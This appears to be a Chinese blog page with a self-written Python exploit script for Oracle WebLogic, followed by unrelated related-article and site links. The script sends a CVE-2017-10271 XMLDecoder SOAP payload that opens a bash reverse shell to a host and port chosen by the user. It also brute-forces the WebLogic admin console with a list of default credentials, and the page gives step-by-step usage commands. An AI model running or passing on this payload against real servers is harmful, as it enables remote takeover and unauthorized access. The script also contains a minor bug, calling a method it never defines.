1. """
  2. 暂时只试用于Linux,先试试用一下反弹shell CVE-2017-10271的EXp
  3. """
  4. import requests
  5. import sys
  6. class Weblogic :
  7. def __init__(self,host,port,url) :
  8. self.url=url
  9. self.host=host
  10. self.port=port
  11. def CVE_2017_10271_Shell(self):
  12. url=self.url+"/wls-wsat/CoordinatorPortType"
  13. port=self.port
  14. host=self.host
  15. header={"Accept":"*/*","Accept-Language":"en","User-Agent":"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)","Content-Type":"text/xml","Connection":"close","Host":self.url.replace("http://","")}
  16. data="""
  17. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
  18. <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
  19. <java version="1.4.0" class="java.beans.XMLDecoder">
  20. <void class="java.lang.ProcessBuilder">
  21. <array class="java.lang.String" length="3">
  22. <void index="0">
  23. <string>/bin/bash</string>
  24. </void>
  25. <void index="1">
  26. <string>-c</string>
  27. </void>
  28. <void index="2">
  29. <string>bash -i &gt;&amp; /dev/tcp/{}/{} 0&gt;&amp;1</string>
  30. </void>
  31. </array>
  32. <void method="start"/></void>
  33. </java>
  34. </work:WorkContext>
  35. </soapenv:Header>
  36. <soapenv:Body/>
  37. </soapenv:Envelope>""".format(self.host,self.port)
  38. Mikasa=requests.post(url,headers=header,data=data)
  39. print("请查看有没有获得Shell!!")
  40. def Shell_Cmd(self) :
  41. pass
  42. def Weak_Password(self):
  43. password=['WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem','mary']
  44. url=self.url+"/console/j_security_check"
  45. for user in password :
  46. for pwd in password :
  47. data={"j_username":user,"j_password":pwd,"j_character_encoding":"UTF-8"}
  48. test=requests.post(url,data=data,allow_redirects=False,verify=False)
  49. if 'console' in test.text and 'LoginForm.jsp' not in test.text :
  50. print("存在弱口令!!!!")
  51. print("user:"+user+" password:"+pwd)
  52. exit()
  53. if __name__=='__main__' :
  54. exp=Weblogic(sys.argv[3],sys.argv[4],sys.argv[1])
  55. if sys.argv[2]=="CVE_2017_10271_Shell":
  56. exp.Reverse_Shell()
  57. elif sys.argv[2]=="Cmd":
  58. pass
  59. elif sys.argv[2]=="Weak_Password" :
  60. exp.Weak_Password()
  61. else :
  62. print("去屎吧2333333")
  63. print("CVE-2018-2628以及CVE-2018-2894也要去试试看,自己暂时还写不出这两个的exp")

使用方法:

反弹shell :    python3  exp.py  http://xxxx:7001/   CVE_2017_10271_Shell     host   port(后面的是你自己反弹Shell的主机ip以及端口)

Weak密码检测:   python3 exp.py  http://xxxx:7001/    Weak_Password    xxx   xxx     (因为用的是类的构造函数整的,所以在进行其他方面的测试的时候会导致后面多一些东西,填任意的即可QAQ)

自己写的Weblogic的poc的更多相关文章

  1. python写批量weblogic爆破脚本

    前言: 整理笔记的时候,发现了weblogic的攻击方法.心里打着算盘看看怎么写 个批量的弱口令爆破脚本.得出了以下思路 思路: 1.利用钟馗之眼采集weblogic的网站,将IP写入到txt 2.添 ...

  2. 用python写注入漏洞的poc

    webug靶场一道简单的注入题 加点后报错 could not to the database You have an error in your SQL syntax; check the manu ...

  3. Pocsuite3--编写破壳CVE-2014-6271_Shellshock的POC

    前言 编写破壳CVE-2014-6271_Shellshock的POC,把公开出来的路径封装起来,作为Pocsuite3的验证POC 情况1:网站无法访问,返回失败 情况2:网站可以访问,无漏洞 情况 ...

  4. weblogic从ssrf到redis获取shell

    一.环境搭建和知识储备 1.1.影响版本 漏洞编号:CVE-2014-4210 weblogic 10.0.2.0 weblogic 10.3.6.0 1.2.Docker搭建环境 1.进入vulhu ...

  5. weblogic-CVE-2020-2551-IIOP反序列化学习记录

    CORBA: 具体的对CORBA的介绍安全客这篇文章https://www.anquanke.com/post/id/199227说的很详细,但是完全记住是不可能的,我觉得读完它要弄清以下几个点: 1 ...

  6. ysoserial分析【一】 之 Apache Commons Collections

    目录 前言 基础知识 Transformer 利用InvokerTransformer造成命令执行 Map TransformedMap LazyMap AnnotationInvocationHan ...

  7. linux下subversion server安装手册

    linux下subversion server安装手册 安装基于的Linux版本为:Red Hat Enterprise Linux Server release 6.3. 一 准备需要的安装包. ( ...

  8. Weblogic11g下调WebService出现的一系列问题

    Weblogic11g下调WebService出现的一系列问题 今天在远程测试机上测试前天写的调用WebService接口方法,遇到的问题还真多啊! 首先说明一下weblogic加载jar包的顺序: ...

  9. 基于Python+协程+多进程的通用弱密码扫描器

    听说不想扯淡的程序猿,不是一只好猿.所以今天来扯扯淡,不贴代码,只讲设计思想. 0x00 起 - 初始设计 我们的目标是设计一枚通用的弱密码扫描器,基本功能是针对不同类型的弱密码,可方便的扩展,比如添 ...

随机推荐

  1. Unsolved输入格式错误1022

    https://pintia.cn/problem-sets/994805342720868352/problems/994805480801550336

  2. css 元素实际宽高

    首先定义一个div. 然后稍微装修一下 下面开始区分 一.clientWidth和clientHeigh . clientTop和clientLeft 1,clientWidth的实际宽度 clien ...

  3. 【Offer】[62] 【圆圈中最后剩下的数字】

    题目描述 思路分析 测试用例 Java代码 代码链接 题目描述 0,1,,n-1这n个数字排成一个圆圈,从数字0开始,每次从这个圆圈里删除第m个数字.求出这个圆圈里剩下的最后一个数字. 牛客网刷题地址 ...

  4. 聚焦Python分布式爬虫必学框架Scrapy 打造搜索引擎视频教程

    下载链接:https://www.yinxiangit.com/595.html 目录: 第1章 课程介绍介绍课程目标.通过课程能学习到的内容.和系统开发前需要具备的知识 第2章 windows下搭建 ...

  5. springboot整合mybatis(注解)

    springboot整合mybatis(注解) 1.pom.xml: <?xml version="1.0" encoding="UTF-8"?> ...

  6. Python集训营45天—Day02

    目录 变量和运算符 1.1 初步介绍 1.2 使用案例 1.3 知识点梳理 1.4 练习 序言:这一章我们将学习变量以及常见的类型,我们将以案例和代码相结合的方式进行梳理,但是其中所有的案例和知识点 ...

  7. NUMA导致的MySQL服务器SWAP问题分析

    [作者] 王栋:携程技术保障中心数据库专家,对数据库疑难问题的排查和数据库自动化智能化运维工具的开发有强烈的兴趣. [问题描述] 我们知道当mysqld进程使用到SWAP时,就会严重影响到MySQL的 ...

  8. Unity3D_01_各种寻找GameObject方法

    1.GameObject.Find(): 寻找Hierarchy面板中的activie 不为false的游戏对象: 路径如官方事例写法: public class ExampleClass : Mon ...

  9. MySQL查看当前用户

    mysql> select current_user();+----------------+| current_user() |+----------------+| root@localho ...

  10. C# HTTP网络常用方法封装

    using System; using System.Collections.Generic; using System.Linq; using System.Text; namespace Regi ...